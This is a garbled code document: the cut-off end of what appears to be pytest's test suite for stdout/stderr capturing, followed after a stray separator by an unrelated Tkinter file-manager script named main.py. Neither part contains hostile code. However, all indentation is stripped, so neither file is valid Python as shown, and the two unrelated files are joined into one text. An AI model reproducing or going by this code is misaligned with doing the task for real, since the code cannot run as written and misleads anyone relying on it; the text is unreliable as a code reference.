"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
@needsosdup
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@needsosdup
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsysbinary):
import sys
# some likely un-decodable bytes
sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
out, err = capsysbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
@needsosdup
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_fdfuncarg_skips_on_no_osdup(testdir):
testdir.makepyfile(
"""
import os
if hasattr(os, 'dup'):
del os.dup
def test_hello(capfd):
pass
"""
)
result = testdir.runpytest_subprocess("--capture=no")
result.stdout.fnmatch_lines(["*1 skipped*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestCaptureAndPassthroughIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(IOError, f.read)
pytest.raises(IOError, f.readlines)
iter_f = iter(f)
pytest.raises(IOError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@needsosdup
def test_dupfile(tmpfile) -> None:
flist = [] # type: List[TextIO]
for i in range(5):
nf = capture.safe_text_dupfile(tmpfile, "wb")
assert nf != tmpfile
assert nf.fileno() != tmpfile.fileno()
assert nf not in flist
print(i, end="", file=nf)
flist.append(nf)
fname_open = flist[0].name
assert fname_open == repr(flist[0].buffer)
for i in range(5):
f = flist[i]
f.close()
fname_closed = flist[0].name
assert fname_closed == repr(flist[0].buffer)
assert fname_closed != fname_open
tmpfile.seek(0)
s = tmpfile.read()
assert "01234" in repr(s)
tmpfile.close()
assert fname_closed == repr(flist[0].buffer)
def test_dupfile_on_bytesio():
bio = io.BytesIO()
f = capture.safe_text_dupfile(bio, "wb")
f.write("hello")
assert bio.getvalue() == b"hello"
assert "BytesIO object" in f.name
def test_dupfile_on_textio():
sio = StringIO()
f = capture.safe_text_dupfile(sio, "wb")
f.write("hello")
assert sio.getvalue() == "hello"
assert not hasattr(f, "name")
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
pytestmark = needsosdup
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2)
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(IOError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
""" for TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n" """
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
pytestmark = needsosdup
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
pytestmark = needsosdup
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert repr(cap.out) == "<FDCapture 1 oldfd=None _state=None>"
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert repr(cap.err) == "<FDCapture 2 oldfd=None _state=None>"
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert repr(cap.in_) == "<FDCapture 0 oldfd=None _state=None>"
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@needsosdup
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
@needsosdup
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture", "TeeSysCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
if method == "StdCaptureFD" and not hasattr(os, "dup"):
pytest.skip("need os.dup")
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "strict"
assert sys.stderr.errors == "strict"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win") and sys.version_info[:2] >= (3, 6),
reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*IOError*")
def test_pickling_and_unpickling_encoded_file():
# See https://bitbucket.org/pytest-dev/pytest/pull-request/194
# pickle.loads() raises infinite recursion if
# EncodedFile.__getattr__ is not implemented properly
ef = capture.EncodedFile(None, None)
ef_as_str = pickle.dumps(ef)
pickle.loads(ef_as_str)
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog", "r") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout", "r") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
result_with_capture.stdout.fnmatch_lines(
["E * TypeError: write() argument must be str, not bytes"]
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, "utf-8")
with pytest.raises(AttributeError):
ef.writelines([b"line1", b"line2"]) # type: ignore[list-item] # noqa: F821
assert ef.writelines(["line1", "line2"]) is None # type: ignore[func-returns-value] # noqa: F821
tmpfile.seek(0)
assert tmpfile.read() == b"line1line2"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
|
main.py
|
import os
from ui.button import Button
from tkinter import BooleanVar, Entry, Frame, PanedWindow, StringVar, Toplevel
from app import App
root = App('File Manager using Tkinter')
root.grid_rowconfigure(1, weight=1)
root.grid_columnconfigure(0, weight=1)
# <header>
from toolbar import Toolbar
header = Toolbar(root, height=32, bg='#fff')
header.grid(row=0, column=0, sticky='ew')
# </header>
# <body>
body = PanedWindow(root, sashwidth=2, bd=0)
# <body-sidebar>
from ui.images import (desktop, documents, downloads, gallery, home, music,
videos)
folders = [
(home, 'Home'),
(desktop, 'Desktop'),
(documents, 'Documents'),
(downloads, 'Downloads'),
(music, 'Music'),
(gallery, 'Pictures'),
(videos, 'Videos')
]
from sidebar import Sidebar
sidebar = Sidebar(body, '#D9D9D9', 'orange', folders)
body.add(sidebar)
# </body-sidebar>
import os
from os.path import isdir, join as joinpath
from platform import system
from subprocess import call as file_call
from ui.frame_stack import FrameStack
if system() == 'Windows':
def open_file(filepath):
if isdir(filepath):
draw_files(filepath)
else:
os.startfile(filepath)
else:
def open_file(filepath):
if isdir(filepath):
draw_files(filepath)
else:
file_call(('xdg-open', filepath))
from datetime import datetime
utc = datetime.utcfromtimestamp
from glob import glob
def draw_files(dir):
if dir == joinpath(path := os.path.expanduser('~'), 'Home'):
os.chdir(path)
print(f'Raised {dir}')
content.raise_frame(path)
return
os.chdir(dir)
if dir in content.frames:
print(f'Raised {dir}')
content.raise_frame(dir)
return
content.push(ScrollableFrame, dir)
r = 0
for name in glob('*'):
file_path = joinpath(dir, name)
size = f'{os.path.getsize(file_path)} Bytes'
mtime = utc(os.path.getmtime(file_path))
mtime = mtime.date()
icon_type = 'dir' if isdir(file_path) else 'file'
ListLabel(content.frames[dir].window, icon_type, name, mtime, size)\
.grid(row=r, column=0, sticky='ew')
r += 1
print(dir, r)
# <body-content>
os.chdir(os.path.expanduser('~'))
from threading import Thread
from ui.list_label import ListLabel
from ui.scrollable_frame import ScrollableFrame
cbody = Frame(root)
cbody.grid_columnconfigure(0, weight=1)
cbody.grid_rowconfigure(1, weight=1)
ListLabel(cbody, None, 'Name', 'Modified', 'Size', bg="#999")\
.grid(sticky='ew', row=0, column=0)
content = FrameStack(cbody)
content.grid(sticky='nsew', row=1, column=0)
Thread(target=draw_files, args=[os.getcwd()], daemon=True).start()
body.add(cbody)
# </body-content>
body.paneconfig(sidebar, minsize=210)
body.grid(sticky='nsew', row=1, column=0, pady=(1, 0))
# </body>
body.bind_class('SidebarLabel',
'<Button-1>',
lambda e:
Thread(target=draw_files, daemon=True, args=[joinpath(
os.path.expanduser('~'), e.widget.cget('text'))]
).start(),
add=True)
def double_clicked(event):
name = event.widget.master.name
Thread(target=open_file, args=[joinpath(
os.getcwd(), name)], daemon=True).start()
def enable_buttons(*buttons):
global cutcopy
for button in header.winfo_children()[1:]:
button.config(state='disabled')
if buttons[0] is None:
return
for button in buttons:
button.config(state='normal')
body.bind_class('ListLabel', '<Double-Button-1>', double_clicked)
body.bind_class('ListLabel', '<Button-1>', ListLabel.change_current)
